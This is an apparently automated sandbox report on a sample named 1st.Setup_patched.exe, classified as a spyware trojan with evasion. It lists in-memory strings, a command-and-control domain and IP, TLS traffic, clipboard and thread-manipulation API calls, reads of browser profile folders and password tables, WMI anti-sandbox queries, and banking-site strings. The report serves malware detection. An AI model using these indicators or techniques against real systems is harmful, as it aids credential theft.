      Source: 1st.Setup_patched.exe, 00000000.00000003.1518040299.000000000174A000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000003.1546842987.000000000174A000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000002.1548204868.000000000174A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://winetersgard.digital/s
      Source: 1st.Setup_patched.exe, 00000000.00000003.1546842987.000000000174A000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000002.1548204868.000000000174A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://winetersgard.digital/t
      Source: 1st.Setup_patched.exe, 00000000.00000003.1496368069.00000000016F3000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000002.1548136991.00000000016F3000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000003.1509169903.00000000016F3000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000003.1536407443.00000000016F3000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000003.1547005847.00000000016F3000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000003.1495829178.00000000016F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://winetersgard.digital:443/agbbBXH
      Source: 1st.Setup_patched.exe, 00000000.00000003.1420807375.0000000004140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
      Source: 1st.Setup_patched.exe, 00000000.00000003.1420807375.0000000004140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
      Source: 1st.Setup_patched.exe, 00000000.00000003.1458449731.000000000411C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
      Source: 1st.Setup_patched.exe, 00000000.00000003.1458449731.000000000411C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
      Source: 1st.Setup_patched.exe, 00000000.00000003.1458546143.000000000423A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
      Source: 1st.Setup_patched.exe, 00000000.00000003.1458546143.000000000423A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
      Source: 1st.Setup_patched.exe, 00000000.00000003.1458546143.000000000423A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
      Source: 1st.Setup_patched.exe, 00000000.00000003.1458946387.0000000001781000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
      Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
      Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
      Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
      Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
      Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
      Source: unknownHTTPS traffic detected: 104.21.13.126:443 -> 192.168.2.6:49691 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.13.126:443 -> 192.168.2.6:49693 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.13.126:443 -> 192.168.2.6:49694 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.13.126:443 -> 192.168.2.6:49695 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.13.126:443 -> 192.168.2.6:49696 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.13.126:443 -> 192.168.2.6:49697 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.13.126:443 -> 192.168.2.6:49698 version: TLS 1.2
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_0356EBC0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,0_3_0356EBC0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_0356EBC0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,0_3_0356EBC0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_03080B72 NtGetContextThread,NtSetContextThread,NtResumeThread,0_3_03080B72
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_030810E8 NtTerminateThread,0_3_030810E8
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_0308066E NtProtectVirtualMemory,0_3_0308066E
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_03080CD8 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_3_03080CD8
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_0353DBF00_3_0353DBF0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_03533AF00_3_03533AF0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_0355FAE00_3_0355FAE0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_035588700_3_03558870
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_035417480_3_03541748
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_0357EF700_3_0357EF70
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_0353B7200_3_0353B720
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_035437B30_3_035437B3
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_035746800_3_03574680
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_03541EB60_3_03541EB6
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_0354DEA50_3_0354DEA5
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_03544D440_3_03544D44
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_035505B00_3_035505B0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_03541C1A0_3_03541C1A
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_035784300_3_03578430
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_0357FCB00_3_0357FCB0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_03573B500_3_03573B50
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_03540B400_3_03540B40
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_03538B600_3_03538B60
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_0354236D0_3_0354236D
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_0353B3000_3_0353B300
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_03579BD00_3_03579BD0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_0353C3E00_3_0353C3E0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_0355EBE00_3_0355EBE0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_0357D2500_3_0357D250
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_03541A7C0_3_03541A7C
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_0353FA000_3_0353FA00
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_035592300_3_03559230
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_03545A290_3_03545A29
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_03554A280_3_03554A28
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_0353CAC00_3_0353CAC0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_035562A00_3_035562A0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_035331500_3_03533150
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_035551700_3_03555170
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_0354D16C0_3_0354D16C
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_035529690_3_03552969
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_035759100_3_03575910
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_0357E9200_3_0357E920
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_035379D00_3_035379D0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_0357F8500_3_0357F850
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_035598400_3_03559840
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_0353C0100_3_0353C010
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_0357A8100_3_0357A810
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_0353A8C00_3_0353A8C0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_035538CD0_3_035538CD
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_035390E00_3_035390E0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_0357C8E00_3_0357C8E0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_0354B0940_3_0354B094
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_03543F4E0_3_03543F4E
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_03549F050_3_03549F05
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_03542F000_3_03542F00
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_03552F080_3_03552F08
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_035557CD0_3_035557CD
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_035687E00_3_035687E0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_03531FA00_3_03531FA0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_03545E000_3_03545E00
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_0357C6200_3_0357C620
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_03539EC00_3_03539EC0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_035386F00_3_035386F0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_0354A6B20_3_0354A6B2
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_0354FEA60_3_0354FEA6
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_035455000_3_03545500
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_0353BDE00_3_0353BDE0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_0354F5990_3_0354F599
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_0356C5A00_3_0356C5A0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_03555CD00_3_03555CD0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_0357CCD00_3_0357CCD0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_035794F00_3_035794F0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_0354BCE00_3_0354BCE0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_03553C800_3_03553C80
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_0357F4A00_3_0357F4A0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_2_005045BC0_2_005045BC
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_2_005041990_2_00504199
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_2_004B43200_2_004B4320
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_2_004744F00_2_004744F0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_2_004286D00_2_004286D0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_2_004C46A00_2_004C46A0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_2_00508C230_2_00508C23
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_2_004F4DD40_2_004F4DD4
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_2_004D8DA00_2_004D8DA0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_2_004AEE400_2_004AEE40
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_2_0050AE9B0_2_0050AE9B
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_2_005091930_2_00509193
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_2_004D92600_2_004D9260
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: String function: 00425050 appears 124 times
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: String function: 004ED986 appears 33 times
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: String function: 00425D20 appears 96 times
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: String function: 00424FA0 appears 37 times
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: String function: 0353B190 appears 43 times
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: String function: 004263C0 appears 108 times
      Source: 1st.Setup_patched.exeBinary or memory string: OriginalFilename vs 1st.Setup_patched.exe
      Source: 1st.Setup_patched.exe, 00000000.00000003.1388703463.00000000036E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CommentsCompanyNameFileDescriptionFileVersionInternalNameLegalCopyrightLegalTrademarksOriginalFilenameProductNameProductVersionPrivateBuildSpecialBuild4'R vs 1st.Setup_patched.exe
      Source: 1st.Setup_patched.exe, 00000000.00000003.1388703463.00000000036E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePSI.exe8 vs 1st.Setup_patched.exe
      Source: 1st.Setup_patched.exe, 00000000.00000002.1547599580.0000000000527000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CommentsCompanyNameFileDescriptionFileVersionInternalNameLegalCopyrightLegalTrademarksOriginalFilenameProductNameProductVersionPrivateBuildSpecialBuild4'T vs 1st.Setup_patched.exe
      Source: 1st.Setup_patched.exe, 00000000.00000000.1216489046.0000000000527000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CommentsCompanyNameFileDescriptionFileVersionInternalNameLegalCopyrightLegalTrademarksOriginalFilenameProductNameProductVersionPrivateBuildSpecialBuild4'T vs 1st.Setup_patched.exe
      Source: 1st.Setup_patched.exe, 00000000.00000002.1547708893.0000000000571000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePSI.exe8 vs 1st.Setup_patched.exe
      Source: 1st.Setup_patched.exeBinary or memory string: CommentsCompanyNameFileDescriptionFileVersionInternalNameLegalCopyrightLegalTrademarksOriginalFilenameProductNameProductVersionPrivateBuildSpecialBuild4'R vs 1st.Setup_patched.exe
      Source: 1st.Setup_patched.exeBinary or memory string: OriginalFilenamePSI.exe8 vs 1st.Setup_patched.exe
      Source: 1st.Setup_patched.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@2/1
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_03574680 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,GetVolumeInformationW,0_3_03574680
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_2_00421110 LoadResource,LockResource,SizeofResource,0_2_00421110
      Source: 1st.Setup_patched.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: 1st.Setup_patched.exe, 00000000.00000003.1419930436.000000000412D000.00000004.00000800.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000003.1445315912.0000000004123000.00000004.00000800.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000003.1420534374.0000000001771000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
      Source: 1st.Setup_patched.exeVirustotal: Detection: 8%
      Source: 1st.Setup_patched.exeString found in binary or memory: --start-in-tray
      Source: 1st.Setup_patched.exeString found in binary or memory: ?A.lnkfWUIStartOnBoot--start-in-tray
      Source: 1st.Setup_patched.exeString found in binary or memory: DelayStateDefinitionTask Name: NameActionsPrincipalRegistrationInfoSettingsConnectNewTaskTriggersSchedule.ServicePT0SCreate logon taskSecuniaPTGetFolder1970-01-01T01:01:01 TriggerGetTasksCountRegisterTaskDefinitionDeleteTaskNo tasks are registered.Number of tasks registered: MaxThreads-- UI Configuration --StartInTrayUIPathUIFilename&csitoken&csitoken=&=&ui=agent&uid==ATL:%p(d) window invalid(i) window invalid(g) window invalid(f) window invalid(e) window invalid found an instance already running, but it went away. Aborting. is already running, focusing previous instance and exiting this instance.COM Initialization. startingactivefDocumentCompleteTearing down COMLlR
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile read: C:\Users\user\Desktop\1st.Setup_patched.exeJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeSection loaded: netapi32.dllJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeSection loaded: webio.dllJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: 1st.Setup_patched.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
      Source: 1st.Setup_patched.exeStatic file information: File size 2610176 > 1048576
      Source: 1st.Setup_patched.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x105a00
      Source: 1st.Setup_patched.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: 1st.Setup_patched.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: 1st.Setup_patched.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: 1st.Setup_patched.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: 1st.Setup_patched.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: 1st.Setup_patched.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: 1st.Setup_patched.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: 1st.Setup_patched.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: C:\deploy\release\psi3\psi_32\cmake\apps\psi\RelWithDebInfo\psi.pdb source: 1st.Setup_patched.exe
      Source: 1st.Setup_patched.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: 1st.Setup_patched.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: 1st.Setup_patched.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: 1st.Setup_patched.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: 1st.Setup_patched.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_2_00503016 EncodePointer,EncodePointer,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00503016
      Source: 1st.Setup_patched.exeStatic PE information: real checksum: 0x240394 should be: 0x288135
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_2_004F4156 push ecx; ret 0_2_004F4169
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_2_004F88E5 push ecx; ret 0_2_004F88F8
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeSystem information queried: FirmwareTableInformationJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: GetAdaptersInfo,0_2_00452CA0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeAPI coverage: 0.1 %
      Source: C:\Users\user\Desktop\1st.Setup_patched.exe TID: 8020Thread sleep time: -150000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exe TID: 8084Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exe TID: 8024Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_2_0047ABB0 FindClose,Sleep,FindFirstFileW,GetLastError,0_2_0047ABB0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_2_004F2D50 _wcspbrk,__getdrive,FindFirstFileExW,_wcspbrk,__wfullpath_helper,_IsRootUNCName,GetDriveTypeW,_free,___loctotime64_t,_free,__sopen_s,__fstat64,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,GetLastError,__dosmaperr,FindClose,0_2_004F2D50
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_2_0048CDE0 FindFirstFileW,GetLastError,__CxxThrowException@8,FindNextFileW,0_2_0048CDE0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_2_004F2132 VirtualQuery,GetSystemInfo,VirtualAlloc,VirtualProtect,0_2_004F2132
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\MozillaJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\CommsJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\CEFJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\PackagesJump to behavior
      Source: 1st.Setup_patched.exe, 00000000.00000003.1445529561.0000000004173000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
      Source: 1st.Setup_patched.exe, 00000000.00000003.1445529561.0000000004173000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
      Source: 1st.Setup_patched.exe, 00000000.00000003.1445529561.0000000004173000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
